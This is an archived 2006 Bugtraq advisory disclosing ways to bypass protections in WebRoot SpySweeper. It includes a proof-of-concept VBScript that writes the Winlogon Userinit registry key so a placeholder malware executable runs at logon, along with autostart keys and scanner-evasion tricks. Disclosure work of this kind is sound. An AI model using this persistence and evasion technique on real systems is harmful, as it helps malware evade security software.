lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060620130740.24012.qmail@securityfocus.com>
Date: 20 Jun 2006 13:07:40 -0000
From: egavriil@...tinel.gr
To: bugtraq@...urityfocus.com
Subject: Multiple Bypass and Integrity Lost Vulnerabilities



                      Sentinel Computer Security Advisory


Sentinel Co.
http://www.sentinel.gr
info@...tinel.gr


General Flaw Description : Multiple Bypass and Integrity Lost Vulnerabilities
-------------------------------------------------------------------------------
                             Advisory Information
-------------------------------------------------------------------------------
Advisory Release Date : 2006/06/20
Advisory ID : SGA-0001
Extends : None
Deprecates : None
-------------------------------------------------------------------------------
                             Product Information
-------------------------------------------------------------------------------
Software Product Name : SpySweeper
Product Version : All to 4.5.9 Build 709
Product Vendor : WebRoot (http://www.webroot.com)
Flawed File Name : spysweeper.exe
File Version : All to 4.5.9 Build 709
Default Local Path of the File : C:\Program Files\Webroot\Spysweeper\
-------------------------------------------------------------------------------
                          Vulnerability Information
-------------------------------------------------------------------------------
Flaw Type : Design Flaw
Operating Systems : All Microsoft Windows
Vulnerability Impact : Bypass Security Measures
Vulnerability Rating : Critical
Patch Status : Unpatched
Advisory Status : Verified
Publicity Level : Published
Other Advisories IDs : None
Flaw Discovery Date : 2006/05/30
Patch Date : None
Vulnerability Credit : Emmanouil Gavriil (egavriil@...tinel.gr)
Exploit Status : Not Released
Exploit Publication Date : None
-------------------------------------------------------------------------------


Description
-----------

WebRoot SpySweeper is an application that provides various security measures
for your computer. Some of these measures can be easily bypassed. The bypass
methods can be used by malware in order to avoid security measures provided by
SpySweeper.


Technical Information
---------------------

The following vulnerabilities have been addressed to WebRoot SpySweeper:

1) Bypassing Startup-Shield. Modifications to Registry Keys could avoid the
   Security Measures provided by the Startup Shield.

2) Bypassing Compression Sweep. Compression Sweep claims to detect malware in
   compressed files, but it seems that it only detects malware in files
   compressed with the ZIP compression.

3) Bypassing Spy Communication Shield. Spy Communication Shield seems to check
   only the domain name to be visited. Instead, if the site is visited by it's
   IP address, Spy Communication Shield does not block it.

4) Integrity lost due to wrong detection of files.


Proof of Concept Experiment
---------------------------

1) The following Registry Keys can be used to bypass the startup shield:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
  HKEY_CLASSES_ROOT\exefile\shell\open\command @="\"%1\" %*"
  HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName

  You can use the following script to prove the vulnerability (save the
  following code as .vbs):
  ****************************************************************************
  Dim WshShell

  Set WshShell = WScript.CreateObject("WScript.Shell")

  WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\", 1, "REG_BINARY"
  WshShell. RegWrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", "C:\WINDOWS\system32\userinit.exe, C:\malware.exe", "REG_SZ"
  WScript. Echo "There is an entry at: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit with Value 'C:\WINDOWS\system32\userinit.exe, C:\malware.exe' After the execution of userinit.exe, malware.exe could be run!"
  ****************************************************************************

2) Compressed file scanning can be bypassed by compressing to one of the
   following formats:
     RAR, GZ, TAR, CAB, ACE
 
3) Spy Communication Shield Bypass Proof of Concept:
   banners.pennyweb.com should be blocked.
   63.208.235.96 is not blocked.
 
4) 90.dl and or 51.dl are valid ARRISCAD (www.arriscad.com) drawing list files.
   SpySweeper tends to remove those files. Such a removal action could destroy
   an arriscad database. Furthermore is quite interesting why even an empty
   file with the name 90.dl or ieonflow.dll can be considered adware or
   spyware. Additionally the renaming of some malware files (ex. ieonflow.dll)
   avoids the detection as malware from the SpySweeper.


Patch Description and Information
---------------------------------

Vendor informed. No reply yet. No patch released yet.


References and Other Resources for Information
----------------------------------------------

None.

EOF.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ